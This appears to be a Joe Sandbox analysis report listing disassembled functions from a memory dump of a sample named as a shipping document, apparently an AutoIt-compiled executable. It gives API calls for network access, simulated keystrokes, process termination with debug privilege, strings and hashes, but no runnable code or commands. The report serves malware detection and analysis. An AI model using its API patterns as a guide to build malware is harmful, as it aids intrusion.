Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ItemMenu$Info$Window$CheckCountEnabledProcRadio
String ID: 0
API String ID: 4045175071-4108050209
Opcode ID: 5907922c008828961a95c7ca605f65b9b17c32e0c366d2f0c7b7f3d5f8a94457
Instruction ID: d894e33b4f05aa506161f6d701bd10d5d1a51f7a5d72fc686bdf73b6eac3a729
Opcode Fuzzy Hash: 5907922c008828961a95c7ca605f65b9b17c32e0c366d2f0c7b7f3d5f8a94457
Instruction Fuzzy Hash: BC5191715043019FD710DF64DC84AAB7BEABF88394F08095AF98497291DB35E905EFA1

Function 00FA4646 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00FA3F58: CharUpperBuffW.USER32(?,?,00000000,00FDD0D0,?,?,00000001,?,?,00FA4286,?,?,?,?,00000000,00FDD0D0), ref: 00FA3FE5

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA437B

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 1256254125-1994484594
Opcode ID: 9e0d8550b772cd88b09a35279ad3716a188b00fa03a4f00e2db8ca5099e70828
Instruction ID: 073340f6b8ee79d021a05de9a463aec63bd067d571c0b7d1c64ad2f3530fb44b
Opcode Fuzzy Hash: 9e0d8550b772cd88b09a35279ad3716a188b00fa03a4f00e2db8ca5099e70828
Instruction Fuzzy Hash: B64107B2F043128B8F14DE79C98053B77E1BFD6760B60052DE88597684EBA0FD45BB91

Function 00FBC171 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC190
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBC1B8
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBC1E8
GetLastError.KERNEL32 ref: 00FBC240
SetEvent.KERNEL32(?), ref: 00FBC254
InternetCloseHandle.WININET(00000000), ref: 00FBC25F

Strings

, xrefs: 00FBC1D9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: e4b953c6865f5da6d1085cdf090c58a25a8c668d5b293e505808ad2653af5d00
Instruction ID: 16de901e6756281db3f016a330972b1ad1c7a4fbb2dc8682ff94a4da94fc3ebd
Opcode Fuzzy Hash: e4b953c6865f5da6d1085cdf090c58a25a8c668d5b293e505808ad2653af5d00
Instruction Fuzzy Hash: 66314171501209AFDB219FA68C89ABB7BFDEB49751B10452EF446D3200D734DD04AFE0

Function 00FA97B9 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F847E6,?,?,Bad directive syntax error,00FDD0D0,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FA97DA
LoadStringW.USER32(00000000,?,00F847E6,?), ref: 00FA97E1

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FA98A5

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00FA980F
Line %d:, xrefs: 00FA9830
Error: , xrefs: 00FA9873
Line %d (File "%s"):, xrefs: 00FA984B
., xrefs: 00FA988B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: f2543431b02b2d583a50114a1a0db95a49b391601fb3f89e4821acab07863ba2
Instruction ID: 9f3065821921cbb8aab29aaab20c3806327a44816aa860a463f363b2c2312358
Opcode Fuzzy Hash: f2543431b02b2d583a50114a1a0db95a49b391601fb3f89e4821acab07863ba2
Instruction Fuzzy Hash: 3C21A63280021EABDF11EF90CC46EEE7B36FF15700F04446AF955660A2DBB99618EF51

Function 00F78CE5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2caa4e613c18a5309673b1cc38703ad24ea7ee7d27cd725b52105d20b9537de
Instruction ID: 3cd0c5a0653aa52970e059c64827a7e13949e7a6c4c08c5122160c10dc2d7af7
Opcode Fuzzy Hash: d2caa4e613c18a5309673b1cc38703ad24ea7ee7d27cd725b52105d20b9537de
Instruction Fuzzy Hash: 97C11871E442459FCF11DFA8D845BEDBBB1AF09320F14809BF45897392CB788942EB62

Function 00F476AA Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00F476D0
GetWindowRect.USER32(?,?), ref: 00F47711
ScreenToClient.USER32(?,?), ref: 00F47739
GetClientRect.USER32(?,?), ref: 00F4787D
GetWindowRect.USER32(?,?), ref: 00F4789E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 2834c39bc18c33eae662425cf94870dc8d7a10bad681d5f643f7abb3910aa292
Instruction ID: 82f24dfd229fa34a93e46ae36f45fd38ec576cd856ef128001dbefa7d8cdf8f8
Opcode Fuzzy Hash: 2834c39bc18c33eae662425cf94870dc8d7a10bad681d5f643f7abb3910aa292
Instruction Fuzzy Hash: A8C13A7990474AEFDB10EFA8C584BEDBBF1FF08310F24841AE895A7250D734A951EB60

Function 00F7CE30 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00F7CE57
_free.LIBCMT ref: 00F7CEC2
_free.LIBCMT ref: 00F7CEE8
_free.LIBCMT ref: 00F7CF11
_free.LIBCMT ref: 00F7CF49
_free.LIBCMT ref: 00F7CF7A
_free.LIBCMT ref: 00F7CFBB
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00F7D03C
_free.LIBCMT ref: 00F7D055

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 49d973f5fc94c270eadfa75f249982884f862dc8682d2522d7eb677d5d25459b
Instruction ID: 92e96d7c33b8f0c0a8e77b9fb0b7a8b4290792ad45e0b9c7e1564580e652a739
Opcode Fuzzy Hash: 49d973f5fc94c270eadfa75f249982884f862dc8682d2522d7eb677d5d25459b
Instruction Fuzzy Hash: FB611871E04205ABDB20AF749C41AAE7BA4AF05320F44C16FF98C97285DA3A9841B7D2

Function 00FD5009 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FD50BB
ShowWindow.USER32(?,00000000), ref: 00FD50FC
ShowWindow.USER32(?,00000005,?,00000000), ref: 00FD5102
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FD5106

Part of subcall function 00FD6E88: DeleteObject.GDI32(00000000), ref: 00FD6EB4

GetWindowLongW.USER32(?,000000F0), ref: 00FD5142
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD514F
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FD5182
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FD51BC
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FD51CB

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 84e6f15eebdc9197698a869b8473a817e27979ccb169d465c0bfb50b2e71462d
Instruction ID: 82b1681ea2958d8f1af41b9dcd5ff2484c3fffb7e6cdc8a147ff49a27c31d99f
Opcode Fuzzy Hash: 84e6f15eebdc9197698a869b8473a817e27979ccb169d465c0bfb50b2e71462d
Instruction Fuzzy Hash: DB515431A4060ABFEF349B24CC49FA97B67AB04B60F1C4113BA159A3E1C7759994FB81

Function 00F5A07B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F972E3
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F972FC
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F9730C
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F97324
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F97345
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F5A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00F97354
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F97371
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F5A05E,00000000,00000000,00000000,000000FF,00000000), ref: 00F97380

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0805539f40b808cae8c77f5affce7ecb0f687604a096ada1d9c0246a551d2651
Instruction ID: 83d05862248fa4f49d307fcc42bc754003d3998fa9861c457b3864d17fdc00bf
Opcode Fuzzy Hash: 0805539f40b808cae8c77f5affce7ecb0f687604a096ada1d9c0246a551d2651
Instruction Fuzzy Hash: 4F518B30A1030AAFEF24DF24CC41FAA7BA6EF44760F104619FA42972D0D775E994EB90

Function 00FBC061 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBC0A0
GetLastError.KERNEL32 ref: 00FBC0B3
SetEvent.KERNEL32(?), ref: 00FBC0C7

Part of subcall function 00FBC171: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC190
Part of subcall function 00FBC171: GetLastError.KERNEL32 ref: 00FBC240
Part of subcall function 00FBC171: SetEvent.KERNEL32(?), ref: 00FBC254
Part of subcall function 00FBC171: InternetCloseHandle.WININET(00000000), ref: 00FBC25F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 106213524223e0a4f9e08d1f24ca2282f738c717257904b06c46b241b1eb5625
Instruction ID: 40069532b57db127c80f98e48e5e4430cb747c5c080cd6f17fd3ed8e7ded5d85
Opcode Fuzzy Hash: 106213524223e0a4f9e08d1f24ca2282f738c717257904b06c46b241b1eb5625
Instruction Fuzzy Hash: 32316D71601706AFDB219F768C44AABBBA9FF48751B00452AF95692611C731E810FFE0

Function 00FA24E6 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA399F
Part of subcall function 00FA3985: GetCurrentThreadId.KERNEL32 ref: 00FA39A6
Part of subcall function 00FA3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA24F7), ref: 00FA39AD

MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2501
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FA251F
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00FA2523
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA252D
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FA2545
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00FA2549
MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2553
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FA2567
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00FA256B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 96e21b4462971f357e7ed3c106b98aa9bea289c9b1d6fad48c516c41951c7f82
Instruction ID: f15b277b5bd77383c8800c70baf256691c836e7ac92dc578c69702e996f2b8c2
Opcode Fuzzy Hash: 96e21b4462971f357e7ed3c106b98aa9bea289c9b1d6fad48c516c41951c7f82
Instruction Fuzzy Hash: AF01DD31750214BBFB1067799C8AF557F5AEB8FB11F100006F318AE0D1C9E16444E9A9

Function 00FA1747 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00FA138D,?,?,00000000), ref: 00FA1750
HeapAlloc.KERNEL32(00000000,?,00FA138D,?,?,00000000), ref: 00FA1757
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FA138D,?,?,00000000), ref: 00FA176C
GetCurrentProcess.KERNEL32(?,00000000,?,00FA138D,?,?,00000000), ref: 00FA1774
DuplicateHandle.KERNEL32(00000000,?,00FA138D,?,?,00000000), ref: 00FA1777
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FA138D,?,?,00000000), ref: 00FA1787
GetCurrentProcess.KERNEL32(00FA138D,00000000,?,00FA138D,?,?,00000000), ref: 00FA178F
DuplicateHandle.KERNEL32(00000000,?,00FA138D,?,?,00000000), ref: 00FA1792
CreateThread.KERNEL32(00000000,00000000,00FA17B8,00000000,00000000,00000000), ref: 00FA17AC

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 9fa9ba9ab8b5f2ca1979a61c4a9b64e0c7ce164381c8d261737376c066a5f0f2
Instruction ID: 43804eef0fd4bde4904f35af2356b42a5d069408267dbad98750080f47ce89c2
Opcode Fuzzy Hash: 9fa9ba9ab8b5f2ca1979a61c4a9b64e0c7ce164381c8d261737376c066a5f0f2
Instruction Fuzzy Hash: 2401C2B5241319BFE710AF75DC4DF677BADEB89711F014411FA05DB192C6709800DB60

Function 00FC444A Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FC456F
VariantInit.OLEAUT32(?), ref: 00FC4670
VariantClear.OLEAUT32(?), ref: 00FC467A
VariantClear.OLEAUT32(?), ref: 00FC46D7

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00FC4653
Null Object assignment in FOR..IN loop, xrefs: 00FC44FF, 00FC462D, 00FC46E5
p, xrefs: 00FC4458

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$p
API String ID: 2610073882-898800301
Opcode ID: 11b422f85a1c2d6ad0c129e147aa378e3d4edb14faeb748976b1f2d9b5a11867
Instruction ID: cf7d9fe039eb7669562865115059882f7eb9709f075eea69c0a784e82ed707f6
Opcode Fuzzy Hash: 11b422f85a1c2d6ad0c129e147aa378e3d4edb14faeb748976b1f2d9b5a11867
Instruction Fuzzy Hash: 7D91AE71E0021AABDF24CFA5C855FAEBBB8EF45724F10851DF515AB284D770A904EFA0

Function 00FCA009 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00FAD3FA: CreateToolhelp32Snapshot.KERNEL32 ref: 00FAD41F
Part of subcall function 00FAD3FA: Process32FirstW.KERNEL32(00000000,?), ref: 00FAD42D
Part of subcall function 00FAD3FA: CloseHandle.KERNEL32(00000000), ref: 00FAD4FA

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA094
GetLastError.KERNEL32 ref: 00FCA0A7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA0DA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00FCA18F
GetLastError.KERNEL32(00000000), ref: 00FCA19A
CloseHandle.KERNEL32(00000000), ref: 00FCA1EB

Strings

SeDebugPrivilege, xrefs: 00FCA0B6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d820ee606d02156a49bf2ea3dcd4088f20ed4b54d4a499e4e8c7b73710b8663c
Instruction ID: 70ce113e398a59c9eacaf7f21ea2831b3fdaa52a7b762d4d0af4ecefcc47b854
Opcode Fuzzy Hash: d820ee606d02156a49bf2ea3dcd4088f20ed4b54d4a499e4e8c7b73710b8663c
Instruction Fuzzy Hash: F061CD30608246AFD720DF14C985F15BBE1AF44318F18848CE4668B7A3C776FC45EB92

Function 00FD37B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FD3858
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FD386D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FD3887
_wcslen.LIBCMT ref: 00FD38CC
SendMessageW.USER32(?,00001057,00000000,?), ref: 00FD38F9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FD3927

Strings

SysListView32, xrefs: 00FD382A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 12b8e467470bd2f6cc1e604b7a8e657a8d3dbadfdb7eb23399eda4a9fd63047a
Instruction ID: 3379b00cd28c2e7a687218f6869781db30c8f0e2ec87b95a165795aaf0ae678d
Opcode Fuzzy Hash: 12b8e467470bd2f6cc1e604b7a8e657a8d3dbadfdb7eb23399eda4a9fd63047a
Instruction Fuzzy Hash: AE419571D00219ABDB219F64CC45FEA7BAAFF08360F140526FA48E7281D775D940EB91

Function 00FABB7C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FABC1B
IsMenu.USER32(00000000), ref: 00FABC3B
CreatePopupMenu.USER32 ref: 00FABC71
GetMenuItemCount.USER32(01245670), ref: 00FABCC2
InsertMenuItemW.USER32(01245670,?,00000001,00000030), ref: 00FABCEA

Strings

2, xrefs: 00FABC55
0, xrefs: 00FABBC6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
